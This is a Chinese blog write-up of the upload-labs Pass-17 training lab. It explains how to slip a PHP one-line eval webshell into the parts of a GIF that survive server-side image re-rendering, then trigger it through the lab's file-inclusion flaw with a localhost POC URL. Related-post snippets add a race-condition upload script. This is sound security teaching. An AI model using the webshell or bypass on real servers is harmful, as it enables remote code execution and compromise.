【网络安全】upload-labs Pass-17 解题详析

原创 已于 2025-09-18 19:44:02 修改 · 6.6k 阅读 · 9 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #文件上传漏洞

于 2023-08-18 20:23:41 首次发布
博客围绕Upload-Labs靶场攻防实战展开,介绍了Antsword蚁剑工具的使用参考资料。还阐述利用后端逻辑代码特性,通过二次渲染图片数据的特点,插入一句话木马,结合靶场文件包含漏洞实现命令执行,给出了详细操作步骤。

【精选优质专栏推荐】


每个专栏均配有案例与图文讲解,循序渐进,适合新手与进阶学习者,欢迎订阅。

文章目录

Antsword蚁剑

蚁剑工具的使用可参考:

【网络安全】AntSword(蚁剑)实战解题详析(入门)

【网络安全】DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集

正文

后端逻辑代码:

<?php
include '../config.php';
include '../head.php';
include '../menu.php';

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}
?>

<div id="upload_panel">
    <ol>
        <li>
            <h3>任务</h3>
            <p>上传<code>图片马</code>到服务器。</p>
            <p>注意:</p>
            <p>1.保证上传后的图片马中仍然包含完整的<code>一句话</code><code>webshell</code>代码。</p>
            <p>2.使用<a href="<?php echo INC_VUL_PATH;?>" target="_bank">文件包含漏洞</a>能运行图片马中的恶意代码。</p>
            <p>3.图片马要<code>.jpg</code>,<code>.png</code>,<code>.gif</code>三种后缀都上传成功才算过关!</p>
        </li>
        <li>
            <h3>上传区</h3>
            <form enctype="multipart/form-data" method="post">
                <p>请选择要上传的图片:<p>
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="上传"/>
            </form>
            <div id="msg">
                <?php 
                    if($msg != null){
                        echo "提示:".$msg;
                    }
                ?>
            </div>
            <div id="img">
                <?php
                    if($is_upload){
                        echo '<img src="'.$img_path.'" width="250px" />';
                    }
                ?>
            </div>
        </li>
        <?php 
            if($_GET['action'] == "show_code"){
                include 'show_code.php';
            }
        ?>
    </ol>
</div>

<?php
include '../footer.php';
?>

imagecreatefrompng是PHP中的一个函数,用于创建一个新的图像资源对象,并从PNG格式的图像文件中读取数据

由于二次渲染后图片中的部分数据会被修改,即(A,B,C)可能会被修改为(A,D,E),那么对于此限制,我们可以找到不被修改的A ,因为它不被过滤,因此我们将A修改为注入语句,此时语句不会被过滤,从而达到命令执行的目的。

我们先下载一个gif图像,使用Hxd编辑器可得到其图像数据:

在这里插入图片描述

HxD Hex Editor 工具的安装使用链接:HxD工具使用说明详细教程 | 优快云@秋说

接着上传该gif,得到二次渲染后的图像:

在这里插入图片描述

接着将该图像另存为8479.gif,使用Hxd编辑器查看:

在这里插入图片描述

可以看到自00000190后,数据被二次渲染,也就是说在该行之前的数据是不会被渲染的。

于是我们插入一句话木马:

<?php @eval($_REQUEST[1]);?>

在这里插入图片描述

保存修改:

在这里插入图片描述

接着重新上传该gif:

在这里插入图片描述

找到该文件路径:

在这里插入图片描述

由于靶场存在文件包含漏洞,于是我们可以利用文件包含实命令执行:

在这里插入图片描述

POC:

http://localhost/upload-labs-master/include.php?file=upload/11078.gif&1=phpinfo();

命令执行成功:

在这里插入图片描述

Upload-labs-master实验笔记:Pass17(二次渲染)
大大大蜜蜂的博客
03-28 1169
Upload-labs-master实验笔记
Upload-labs靶场Pass-17之二次渲染
wanggonghanfei的博客
10-27 516
Upload-labs靶场Pass-17之二次渲染
upload-labs17
qq_46527080的博客
12-25 1518
第十七关(二次渲染) 源码分 imagecreatefromjpeg — 由文件或 URL 创建一个新图象。 然后将第一个我们写入的一句话木马给转码掉了,我们找到渲染的分割线,在分割线之前来进行写入一句话木马 首先制造图片码,gif的后缀 制作完成之后在上传 上传成功之后,再下载下来查看 发现咱们的码没有了 要找渲染的分隔点 从这里可以看出,这里开始有变化,咱们看看 然后上传之后在下载 然后下载,发现一句话木马可以了 如果复制不可以的话,我们可以手敲一句话木马 然后我们再利用文件包含漏洞进行解 http
文件上传--Upload-labs--Pass17--条件竞争
2302_79800344的博客
02-20 1336
条件竞争原理
upload_labs_pass17_二次渲染
qq_51550750的博客
04-12 1087
pass17-源码分 打开pass17,貌似和前面的几关差不多(pass14,15,16都是图片马)。 看源码和提示: 提示: 即利用上传的图片生成了一张新的图片。 源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name']; $filetype = $_F
[网络安全]upload-labs Pass-18 解题_upload-labs18关条件竞争
2401_84972676的博客
05-13 666
创建一个允许上传的文件扩展名数组$ext_arr,包括了允许上传的图片类型(jpg、png、gif)。根据定义的上传路径UPLOAD_PATH和文件名生成待存储的文件路径$upload_file。在移动成功的情况下,使用in_array函数检查文件扩展名是否在允许上传的类型数组中。如果文件扩展名不在允许上传的类型数组中,记录错误信息$msg,并删除已上传的文件。如果有,则开始处理文件上传。如果文件扩展名在允许上传的类型数组中,生成一个随机的文件名。msg为空,来初始化文件上传的状态和错误信息。
[网络安全]upload-labs Pass-14 解题_upload-labs-linux pass14(1)
2401_84972580的博客
05-13 531
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[网络安全]upload-labs Pass-17 解题
2401_84972648的博客
05-13 414
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
精选资源
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload-labs Pass-08
wanggonghanfei的博客
10-21 499
利用这一点,我们可以上传我们的shell,然后抓包,在包中修改文件后缀添加一个点,来达到绕过。在windows环境下,假设我们新建一个1.php文件,然后在文件后缀加一个。windows会默认去掉那个点,变成1.php。file_name);//删除文件名末尾的点。发现相较于之前关卡,缺少了。
upload -labs pass17
qq_45106794的博客
11-07 688
#upload -labs pass17 ####################### unlink() 函数删除文件。 若成功,则返回 true,失败则返回 false。 语法 unlink(filename,context) ####################### $is_upload = false; $msg = null; if(isset($_POST['submit']...
upload-labs】————17Pass-16
Fly_鹏程万里
08-15 486
查看源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name']; $filetype = $_FILES['upload_file']['typ...
制作图片马:二次渲染(upload-labs17关)
m0_72286569的博客
03-12 3430
在本关的代码中这个imagecreatefromjpeg();函数起到了将上传的图片打乱并重新组合。这就意味着在制作图片马的时候要将木马插入到图片没有被改变的部分。
upload-labs:pass-17
羽的博客
07-11 233
这是关于二次渲染的题,就是在后端同过二次渲染,将图片中的违法代码删除掉。 上传前的图片马: 上传后的图片马: 把代码过滤掉了。
upload-labs之第十七和十八关
田田云逸的博客
10-28 2557
Pass17 打开第十七关,通过提示发现跟以前的都不一样。 看来是需要进行代码审计了,那么来看看源码吧 $is_upload = false;$msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_n.
upload-labs通关小记 Pass17-20 含代码审计
Neonline254的博客
10-26 814
记录了学习"文件上传漏洞"时打的upload-labs靶场Pass17-20,包含具体的实验过程和一些题目的代码审计。
Upload-Labs(17-20)
Braindance
02-28 349
Pass-17 ​ (windows环境,php版本5.2.17,题号是18题) 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; .
upload-labs17
weixin_40709439的博客
09-17 2116
 upload-labs 一个帮你总结所有类型的上传漏洞的靶场 文件上传靶机下载地址:https://github.com/c0ny1/upload-labs17题,条件竞争删除文件绕过 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png...
upload-labs(Pass-17,文件上传二次渲染)
m0_64849639的博客
08-18 631
Pass-17文件上传二次渲染
upload-labs pass17
最新发布
12-27
### 关于Upload-Labs Pass-17 的分Upload-Labs 中,Pass-17 主要涉及白名单机制下的资源竞争漏洞[^3]。此关卡设计用于测试上传文件过程中可能存在的竞态条件(race condition),即两个操作依赖相同的资源但在不同时间发生。 #### 资源竞争概述 当服务器处理文件上传请求时,在验证文件合法性与实际保存之间存在短暂的时间窗口。攻击者可以利用这段时间差替换合法文件为恶意脚本,从而绕过安全检测。 #### 实现细节 为了成功完成这一挑战,通常需要满足以下几个要素: - **快速响应**:确保客户端能够迅速发送第二个HTTP请求以覆盖原始上传文件。 - **同步控制**:精确把握两次请求之间的时机,使第二次请求恰好发生在第一次请求被接受但还未完全处理完毕之时。 下面是一个简单的Python脚本示例,展示了如何模拟这种攻击行为: ```python import requests from threading import Thread def upload_file(file_path, url): files = {'file': open(file_path,'rb')} r = requests.post(url,files=files) if __name__ == "__main__": target_url = 'http://your-target-url.com/upload' # 启动线程执行正常图片上传 t1 = Thread(target=upload_file,args=('normal_image.jpg',target_url)) t1.start() # 稍作延迟后启动另一个线程尝试覆盖原文件 time.sleep(0.5) t2 = Thread(target=upload_file,args=('malicious.php',target_url)) t2.start() t1.join() t2.join() ``` 上述代码片段仅作为学习目的展示,并不应应用于非法用途。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值